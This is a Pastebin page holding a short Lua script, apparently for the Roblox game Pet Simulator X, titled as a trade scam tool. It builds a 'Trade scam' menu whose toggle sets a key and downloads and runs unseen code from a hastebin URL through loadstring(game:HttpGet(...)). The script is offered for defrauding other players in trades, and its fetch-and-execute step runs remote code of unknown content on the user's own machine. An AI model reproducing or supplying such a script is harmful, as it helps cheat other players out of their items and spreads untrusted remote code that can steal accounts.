Advertisement
Guest User

Trade/Scam Script Psx

a guest
Nov 4th, 2022
7,006
-3
Never
5
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.54 KB | None | 0 3
  1. local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
  2. local Window = Library.CreateLib("Trade scam", "DarkTheme")
  3.  
  4. --Trade
  5. local Trade = Window:NewTab("Trade")
  6. local ScamSection = Trade:NewSection("Scam")
  7.  
  8.  
  9. ScamSection:NewToggle("Trade Scam", "Put Pet a Trade and on this", function(state)
  10. if state then
  11. _G.Key = 1868719956
  12. loadstring(game:HttpGet("https://hastebin.app/raw/626c2b78d3810c001cf24b08"))()
  13. else
  14. print("Toggle Off")
  15. end
  16. end)
Advertisement
Comments
Add Comment
Please, Sign In to add comment
Advertisement